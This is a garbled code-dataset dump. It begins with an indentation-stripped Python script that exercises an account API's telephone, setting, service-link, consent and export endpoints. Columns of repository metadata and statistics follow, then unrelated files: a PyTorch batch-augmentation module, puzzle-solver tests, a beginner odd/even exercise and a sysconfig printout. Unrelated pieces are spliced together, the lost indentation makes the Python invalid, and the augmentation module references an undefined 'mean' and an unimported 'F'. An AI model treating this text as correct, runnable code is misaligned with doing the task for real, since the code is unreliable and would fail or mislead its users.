try:
new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/", headers=headers, data=telephone_template)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))
print ("------------------------------------")
title = "List Telephones"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
telephones_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("telephones_id: " + telephones_id)
print ("------------------------------------")
title = "One Telephone"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/" + telephones_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("telephones_id: " + str(entry[1]['data'].get("id", "None")))
print ("------------------------------------")
title = "Patch Telephone"
print(title)
try:
telephone_template_for_patch['data']['id'] = str(telephones_id)
updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/" + telephones_id + "/", headers=headers, data=telephone_template_for_patch)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))
# ##################################
# # SETTINGS
# ##################################
label = "# \n# SETTINGS \n#################################"
print(label)
request_statuses.append(label)
title = "Add Setting"
print(title)
try:
new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/", headers=headers, data=setting_template)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))
print ("------------------------------------")
title = "List Settings"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
settings_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("settings_id: " + settings_id)
print ("------------------------------------")
title = "One Setting"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/" + settings_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("settings_id: " + str(entry[1]['data'].get("id", "None")))
print ("------------------------------------")
title = "Patch Setting"
print(title)
try:
setting_template_for_patch['data']['id'] = str(settings_id)
updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/" + settings_id + "/", headers=headers, data=setting_template_for_patch)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))
# ##################################
# # EVENT LOGS
# ##################################
# # label = "# \n# EVENT LOGS \n#################################"
# # print(label)
# # request_statuses.append(label)
# #
# # print ("------------------------------------")
# # title = "List Events"
# # print(title)
# # try:
# # entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/logs/events/", headers=headers)
# # except Exception as exp:
# # print(title + ": " + repr(exp))
# # request_response = title + ": " + repr(exp)
# # request_statuses.append(request_response)
# # raise
# # else:
# # request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
# # print('request_response: ' + request_response)
# # request_statuses.append(request_response)
# # event_log_id = str(entries[1]['data'][0].get("id", "None"))
# # print ("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))
# # print ("event_log_id: " + event_log_id)
# #
# #
# # print ("------------------------------------")
# # title = "One Event"
# # print(title)
# # try:
# # entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/logs/events/" + event_log_id + "/", headers=headers)
# # except Exception as exp:
# # print(title + ": " + repr(exp))
# # request_response = title + ": " + repr(exp)
# # request_statuses.append(request_response)
# # raise
# # else:
# # request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
# # print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
# # print ("event_log_id: " + str(entry[1]['data'].get("id", "None")))
#
#
# ##################################
# # Service Link Records
# ##################################
label = "# \n# Service Link Records \n#################################"
print(label)
request_statuses.append(label)
print ("------------------------------------")
title = "Service Link Records"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
slr_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("slr_id: " + slr_id)
print ("------------------------------------")
title = "One Service Link Record"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("slr_id: " + str(entry[1]['data'].get("id", "None")))
##################################
# Service Link Status Records
##################################
label = "# \n# Service Link Status Records \n#################################"
print(label)
request_statuses.append(label)
print ("------------------------------------")
title = "Service Link Status Records"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/statuses/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
slsr_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("slsr_id: " + slsr_id)
print ("------------------------------------")
title = "One Service Link Status Record"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/statuses/" + slsr_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("slsr_id: " + str(entry[1]['data'].get("id", "None")))
##################################
# Consent Records
##################################
label = "# \n# Consent Records \n#################################"
print(label)
request_statuses.append(label)
print ("------------------------------------")
title = "Consent Records"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
cr_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("cr_id: " + cr_id)
print ("------------------------------------")
title = "One Consent Record"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/" + cr_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("cr_id: " + str(entry[1]['data'].get("id", "None")))
##################################
# Consent Status Records
##################################
label = "# \n# Consent Status Records \n#################################"
print(label)
request_statuses.append(label)
print ("------------------------------------")
title = "Consent Status Records"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/" + cr_id + "/statuses/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
csr_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("csr_id: " + csr_id)
print ("------------------------------------")
title = "One Consent Status Record"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/" + cr_id + "/statuses/" + csr_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
request_statuses.append("csr_id: " + str(entry[1]['data'].get("id", "None")))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("csr_id: " + str(entry[1]['data'].get("id", "None")))
##################################
# Export Account
##################################
label = "# \n# Account Export \n#################################"
print(label)
request_statuses.append(label)
print ("------------------------------------")
title = "Account Export"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/export/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
#################################
#################################
#################################
#################################
# REPORT #
#################################
print ("=====================================")
print("Request report")
for request in request_statuses:
print(request)
| 34.550439
| 177
| 0.585814
| 3,406
| 31,510
| 5.254257
| 0.056078
| 0.130755
| 0.090355
| 0.067948
| 0.849799
| 0.82253
| 0.804817
| 0.791965
| 0.787383
| 0.758941
| 0
| 0.009238
| 0.185846
| 31,510
| 911
| 178
| 34.588364
| 0.688353
| 0.066455
| 0
| 0.707801
| 0
| 0
| 0.203396
| 0.045498
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004255
| false
| 0.012766
| 0.007092
| 0
| 0.015603
| 0.266667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
625e76f051cc95f3c0cf8e882023e1bab40245d3
| 53
|
py
|
Python
|
module/__init__.py
|
abhinavg97/baseline_simpletransformers_classification
|
178881178b211e321683c1e338bb06e6e334d7fa
|
[
"Unlicense"
] | null | null | null |
module/__init__.py
|
abhinavg97/baseline_simpletransformers_classification
|
178881178b211e321683c1e338bb06e6e334d7fa
|
[
"Unlicense"
] | null | null | null |
module/__init__.py
|
abhinavg97/baseline_simpletransformers_classification
|
178881178b211e321683c1e338bb06e6e334d7fa
|
[
"Unlicense"
] | null | null | null |
#from module import utils
from module import metrics
| 17.666667
| 26
| 0.830189
| 8
| 53
| 5.5
| 0.625
| 0.454545
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 53
| 2
| 27
| 26.5
| 0.977778
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6261216676c424621c685241922bd58b6cf51592
| 42
|
py
|
Python
|
lib/__init__.py
|
dato2003/Chat-1
|
29d07907eb94609e0f1c43ded45e08c3d82c4f39
|
[
"Apache-2.0"
] | null | null | null |
lib/__init__.py
|
dato2003/Chat-1
|
29d07907eb94609e0f1c43ded45e08c3d82c4f39
|
[
"Apache-2.0"
] | null | null | null |
lib/__init__.py
|
dato2003/Chat-1
|
29d07907eb94609e0f1c43ded45e08c3d82c4f39
|
[
"Apache-2.0"
] | 1
|
2018-08-04T18:37:14.000Z
|
2018-08-04T18:37:14.000Z
|
from . import database
from . import types
| 21
| 22
| 0.785714
| 6
| 42
| 5.5
| 0.666667
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 42
| 2
| 23
| 21
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
65cb238608ce766642b798e676267ace846dd7f0
| 2,564
|
py
|
Python
|
modules/simple_wires/test_solver.py
|
Ao-Re/keep-typing-and-nobody-explodes
|
deff70c384b3271315acd49bcbfd62c05ed9a7ce
|
[
"MIT"
] | null | null | null |
modules/simple_wires/test_solver.py
|
Ao-Re/keep-typing-and-nobody-explodes
|
deff70c384b3271315acd49bcbfd62c05ed9a7ce
|
[
"MIT"
] | null | null | null |
modules/simple_wires/test_solver.py
|
Ao-Re/keep-typing-and-nobody-explodes
|
deff70c384b3271315acd49bcbfd62c05ed9a7ce
|
[
"MIT"
] | 2
|
2020-10-04T17:04:31.000Z
|
2020-10-20T16:59:50.000Z
|
import unittest
from .solver import solve_simple_wires
class TestSimpleWireSolver(unittest.TestCase):
def test_ThreeWires(self):
input=['yellow', 'yellow', 'black']
self.assertEqual(solve_simple_wires(input, True), 'Cut the second wire')
input=['yellow','red','white']
self.assertEqual(solve_simple_wires(input, True), 'Cut the last wire')
input=['blue','red','blue']
self.assertEqual(solve_simple_wires(input, True), 'Cut the last blue wire')
input=['white','white','red']
self.assertEqual(solve_simple_wires(input, True), 'Cut the last wire')
def test_FourWires(self):
input=['red', 'red', 'yellow', 'yellow']
self.assertEqual(solve_simple_wires(input, True), 'Cut the last red wire')
input=['white','black','yellow','yellow']
self.assertEqual(solve_simple_wires(input, True), 'Cut the first wire')
input=['white','black','yellow','blue']
self.assertEqual(solve_simple_wires(input, True), 'Cut the first wire')
input=['white','yellow','yellow','white']
self.assertEqual(solve_simple_wires(input, True), 'Cut the last wire')
input=['white','yellow','black','white']
self.assertEqual(solve_simple_wires(input, True), 'Cut the second wire')
def test_FiveWires(self):
input=['red','blue','yellow','red','black']
self.assertEqual(solve_simple_wires(input, True), 'Cut the fourth wire')
input=['red','blue','yellow','blue','yellow']
self.assertEqual(solve_simple_wires(input, True), 'Cut the first wire')
input=['red','blue','yellow','red','white']
self.assertEqual(solve_simple_wires(input, True), 'Cut the second wire')
input=['black','blue','yellow','red','white']
self.assertEqual(solve_simple_wires(input, True), 'Cut the first wire')
def test_SixWires(self):
input=['red','blue','red','red','black','red']
self.assertEqual(solve_simple_wires(input, True), 'Cut the third wire')
input=['red','white','yellow','white','black','red']
self.assertEqual(solve_simple_wires(input, True), 'Cut the fourth wire')
input=['blue','blue','blue','white','black','white']
self.assertEqual(solve_simple_wires(input, False), 'Cut the last wire')
input=['blue','blue','blue','red','black','white']
self.assertEqual(solve_simple_wires(input, False), 'Cut the fourth wire')
def test_Invalid(self):
input=['red']
self.assertEqual(solve_simple_wires(input, True), 'Invalid')
| 55.73913
| 83
| 0.646646
| 324
| 2,564
| 4.984568
| 0.108025
| 0.129412
| 0.188235
| 0.289783
| 0.780186
| 0.726316
| 0.713313
| 0.713313
| 0.683591
| 0.683591
| 0
| 0
| 0.178237
| 2,564
| 45
| 84
| 56.977778
| 0.766493
| 0
| 0
| 0.272727
| 0
| 0
| 0.2617
| 0
| 0
| 0
| 0
| 0
| 0.409091
| 1
| 0.113636
| false
| 0
| 0.045455
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65eca2b219128d394778fff4d8481c6dbf03510d
| 383
|
py
|
Python
|
desafios/desafio030.py
|
genisyskernel/cursoemvideo-python
|
dec301e33933388c886fe78010f38adfb24dae82
|
[
"MIT"
] | 1
|
2020-10-26T04:33:14.000Z
|
2020-10-26T04:33:14.000Z
|
desafios/desafio030.py
|
genisyskernel/cursoemvideo-python
|
dec301e33933388c886fe78010f38adfb24dae82
|
[
"MIT"
] | null | null | null |
desafios/desafio030.py
|
genisyskernel/cursoemvideo-python
|
dec301e33933388c886fe78010f38adfb24dae82
|
[
"MIT"
] | null | null | null |
numero_inteiro = int(input("\033[1;35mDigite um numero inteiro: \033[m"))
if numero_inteiro % 2 == 0:
print("\033[1;36mO numero\033[m \033[1;35m{0}\033[m \033[1;36me\033[m \033[1;35mPAR\033[m\033[1;36m!\033[m".format(numero_inteiro))
else:
print("\033[1;36mO numero\033[m \033[1;35m{0}\033[m \033[1;36me\033[m \033[1;35mIMPAR\033[m\033[1;36m!\033[m".format(numero_inteiro))
| 54.714286
| 137
| 0.684073
| 80
| 383
| 3.225
| 0.2625
| 0.170543
| 0.217054
| 0.248062
| 0.658915
| 0.658915
| 0.658915
| 0.658915
| 0.658915
| 0.658915
| 0
| 0.294286
| 0.086162
| 383
| 6
| 138
| 63.833333
| 0.442857
| 0
| 0
| 0
| 0
| 0.4
| 0.631854
| 0.193211
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65edf8942ed221dba6eb19240c5d997b4c53cabb
| 9,902
|
py
|
Python
|
torchreid/models/batch.py
|
Vill-Lab/IGOAS
|
42ca1d45e441f993c95b5e8f33c9f97ea3b916f3
|
[
"MIT"
] | 8
|
2021-05-27T10:19:28.000Z
|
2021-10-15T12:38:04.000Z
|
torchreid/models/batch.py
|
Vill-Lab/IGOAS
|
42ca1d45e441f993c95b5e8f33c9f97ea3b916f3
|
[
"MIT"
] | 3
|
2021-06-23T12:06:39.000Z
|
2021-09-12T08:40:44.000Z
|
torchreid/models/batch.py
|
Vill-Lab/IGOAS
|
42ca1d45e441f993c95b5e8f33c9f97ea3b916f3
|
[
"MIT"
] | 6
|
2021-05-27T10:19:18.000Z
|
2021-11-13T12:02:17.000Z
|
import random
from torch import nn
import math
class BatchCrop(nn.Module):
def __init__(self, p = 0.5, sl=0.25, sh=0.75, r1=0.25, Threshold=1):
super(BatchCrop, self).__init__()
self.p = p
self.sl = sl
self.sh = sh
self.r1 = r1
self.it = 0
self.Threshold = Threshold
self.sx = None
self.sy = None
def forward(self, x):
if self.training:
# if random.uniform(0, 1) > self.p:
# return x
for attempt in range(100):
h, w = x.size()[-2:]
area = h * w
target_area = random.uniform(self.sl, self.sh) * area
aspect_ratio = random.uniform(self.r1, 1/self.r1)
rh = int(round(math.sqrt(target_area * aspect_ratio)))
rw = int(round(math.sqrt(target_area / aspect_ratio)))
if rw < w and rh < h:
if self.it % self.Threshold == 0:
self.sx = random.randint(0, h - rh)
self.sy = random.randint(0, w - rw)
self.it += 1
x_crop = x[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw]
x = F.interpolate(x_crop, (384,128), mode='bilinear',align_corners= True)
return x
return x
# class BatchDrop(nn.Module):
# def __init__(self, h_ratio=0.3, w_ratio=1, Threshold=1):
# super(BatchDrop, self).__init__()
# self.h_ratio = h_ratio
# self.w_ratio = w_ratio
# self.it = 0
# self.Threshold = Threshold
# self.sx = None
# self.sy = None
# def forward(self, x):
# if self.training:
# h, w = x.size()[-2:]
# rh = round(self.h_ratio * h)
# rw = round(self.w_ratio * w)
# if self.it % self.Threshold == 0:
# self.sx = random.randint(0, h - rh)
# self.sy = random.randint(0, w - rw)
# self.it += 1
# mask = x.new_ones(x.size())
# mask[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw] = 0
# x = x * mask
# return x
# return x
class BatchDrop(nn.Module):
def __init__(self, sl=0.2, sh=0.5, r1=0.25, Threshold=1):
super(BatchDrop, self).__init__()
self.it = 0
self.Threshold = Threshold
self.sx = None
self.sy = None
self.mean = mean
self.sl = sl
self.sh = sh
self.r1 = r1
def forward(self, x):
if self.training:
for attempt in range(100):
h, w = x.size()[-2:]
area = h * w
target_area = random.uniform(self.sl, self.sh) * area
aspect_ratio = random.uniform(self.r1, 1/self.r1)
rh = int(round(math.sqrt(target_area * aspect_ratio)))
rw = int(round(math.sqrt(target_area / aspect_ratio)))
if rw < w and rh < h:
if self.it % self.Threshold == 0:
self.sx = random.randint(0, h - rh)
self.sy = random.randint(0, w - rw)
self.it += 1
mask = x.new_ones(x.size())
mask[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw] = 0
x = x * mask
return x
return x
class BatchErasing(nn.Module):
def __init__(self, sl=0.2, sh=0.5, r1=0.25, mean=[0.4914, 0.4822, 0.4465], Threshold=1):
super(BatchErasing, self).__init__()
self.it = 0
self.Threshold = Threshold
self.sx = None
self.sy = None
self.mean = mean
self.sl = sl
self.sh = sh
self.r1 = r1
def forward(self, x):
if self.training:
for attempt in range(100):
h, w = x.size()[-2:]
area = h * w
target_area = random.uniform(self.sl, self.sh) * area
aspect_ratio = random.uniform(self.r1, 1/self.r1)
rh = int(round(math.sqrt(target_area * aspect_ratio)))
rw = int(round(math.sqrt(target_area / aspect_ratio)))
if rw < w and rh < h:
if self.it % self.Threshold == 0:
self.sx = random.randint(0, h - rh)
self.sy = random.randint(0, w - rw)
self.it += 1
x[:, 0, self.sx:self.sx + rh, self.sy:self.sy + rw] = self.mean[0]
x[:, 1, self.sx:self.sx + rh, self.sy:self.sy + rw] = self.mean[1]
x[:, 2, self.sx:self.sx + rh, self.sy:self.sy + rw] = self.mean[2]
return x
return x
# class BatchChange(nn.Module):
# def __init__(self, choose, sl=0.25, sh=0.75, r1=0.25, mean=[0.4914, 0.4822, 0.4465], Threshold=1):
# super(BatchChange, self).__init__()
# self.it = 0
# self.Threshold = Threshold
# self.sx = None
# self.sy = None
# self.mean = mean
# self.sl = sl
# self.sh = sh
# self.r1 = r1
# self.choose = choose
# def forward(self, x):
# if self.training:
# h, w = x.size()[-2:]
# area = h * w
# target_area = random.uniform(self.sl, self.sh) * area
# aspect_ratio = random.uniform(self.r1, 1/self.r1)
# for attempt in range(100):
# rh = int(round(math.sqrt(target_area * aspect_ratio)))
# rw = int(round(math.sqrt(target_area / aspect_ratio)))
# if rw < w and rh < h:
# if self.it % self.Threshold == 0:
# self.sx = random.randint(0, h - rh)
# self.sy = random.randint(0, w - rw)
# self.it += 1
# if self.choose == 0:
# # print(self.choose)
# mask = x.new_zeros(x.size())
# mask[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw] = 1
# x = x * mask
# return x
# if self.choose == 1:
# # print(self.choose)
# x[:, 0, 0:self.sx , :] = self.mean[0]
# x[:, 0, self.sx + rh:h , :] = self.mean[0]
# x[:, 0, self.sx :self.sx+rh , 0:self.sy] = self.mean[0]
# x[:, 0, self.sx :self.sx+rh , self.sy+rw:w] = self.mean[0]
# x[:, 1, 0:self.sx , :] = self.mean[1]
# x[:, 1, self.sx + rh:h , :] = self.mean[1]
# x[:, 1, self.sx :self.sx+rh , 0:self.sy] = self.mean[1]
# x[:, 1, self.sx :self.sx+rh , self.sy+rw:w] = self.mean[1]
# x[:, 2, 0:self.sx , :] = self.mean[2]
# x[:, 2, self.sx + rh:h , :] = self.mean[2]
# x[:, 2, self.sx :self.sx+rh , 0:self.sy] = self.mean[2]
# x[:, 2, self.sx :self.sx+rh , self.sy+rw:w] = self.mean[2]
# return x
# return x
class RandomErasing(nn.Module):
def __init__(self, sl=0.1, sh=0.4, r1=0.3, mean=[0.4914, 0.4822, 0.4465]):
super(RandomErasing, self).__init__()
# self.probability = probability
self.mean = mean
self.sl = sl
self.sh = sh
self.r1 = r1
# img 32,3,384,128
def forward(self, img):
# if random.uniform(0, 1) > self.probability:
# return img
for i in range(img.size(0)):
for attempt in range(100):
area = img.size()[2] * img.size()[3]
target_area = random.uniform(self.sl, self.sh) * area
aspect_ratio = random.uniform(self.r1, 1 / self.r1)
h = int(round(math.sqrt(target_area * aspect_ratio)))
w = int(round(math.sqrt(target_area / aspect_ratio)))
if w < img.size()[3] and h < img.size()[2]:
x1 = random.randint(0, img.size()[2] - h)
y1 = random.randint(0, img.size()[3] - w)
if img.size()[1] == 3:
img[i, 0, x1:x1 + h, y1:y1 + w] = self.mean[0]
img[i, 1, x1:x1 + h, y1:y1 + w] = self.mean[1]
img[i, 2, x1:x1 + h, y1:y1 + w] = self.mean[2]
# print(img[i, 0, x1:x1 + h, y1:y1 + w])
break
return img
class RandomDrop(nn.Module):
def __init__(self, sl=0.1, sh=0.4, r1=0.3, mean=[0.4914, 0.4822, 0.4465]):
super(RandomDrop, self).__init__()
# self.probability = probability
self.mean = mean
self.sl = sl
self.sh = sh
self.r1 = r1
# img 32,3,384,128
def forward(self, img):
# if random.uniform(0, 1) > self.probability:
# return img
for i in range(img.size(0)):
for attempt in range(100):
area = img.size()[2] * img.size()[3]
target_area = random.uniform(self.sl, self.sh) * area
aspect_ratio = random.uniform(self.r1, 1 / self.r1)
h = int(round(math.sqrt(target_area * aspect_ratio)))
w = int(round(math.sqrt(target_area / aspect_ratio)))
if w < img.size()[3] and h < img.size()[2]:
x1 = random.randint(0, img.size()[2] - h)
y1 = random.randint(0, img.size()[3] - w)
if img.size()[1] == 3:
img[i, :, x1:x1 + h, y1:y1 + w] = 0
break
return img
| 39.608
| 104
| 0.444961
| 1,305
| 9,902
| 3.295019
| 0.066667
| 0.058605
| 0.062791
| 0.036279
| 0.893721
| 0.870465
| 0.857674
| 0.83186
| 0.812326
| 0.799302
| 0
| 0.05568
| 0.414159
| 9,902
| 250
| 105
| 39.608
| 0.685571
| 0.354474
| 0
| 0.789855
| 0
| 0
| 0.001268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072464
| false
| 0
| 0.021739
| 0
| 0.188406
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02ba82b3c576487aff198bb2ea47f2e9f06e8f5d
| 152
|
py
|
Python
|
tests/sources/python-config-output.py
|
hugovk/python-versions
|
c27507421a8edf9cfe1817c0615054bf6c7211b6
|
[
"MIT"
] | 92
|
2020-04-17T22:04:56.000Z
|
2022-03-11T19:19:45.000Z
|
tests/sources/python-config-output.py
|
Yuriy-Kukushkin/python-versions
|
ae216d3a0bc2b7e26696e35b476b4ef1e8e55b36
|
[
"MIT"
] | 18
|
2020-04-27T06:17:15.000Z
|
2022-01-18T17:25:41.000Z
|
tests/sources/python-config-output.py
|
Yuriy-Kukushkin/python-versions
|
ae216d3a0bc2b7e26696e35b476b4ef1e8e55b36
|
[
"MIT"
] | 77
|
2020-05-01T22:59:35.000Z
|
2022-03-20T08:38:58.000Z
|
import distutils.sysconfig
import sysconfig
from pprint import pprint
pprint(sysconfig.get_config_vars())
pprint(distutils.sysconfig.get_config_vars())
| 25.333333
| 45
| 0.855263
| 20
| 152
| 6.3
| 0.4
| 0.285714
| 0.285714
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065789
| 152
| 6
| 45
| 25.333333
| 0.887324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0.6
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
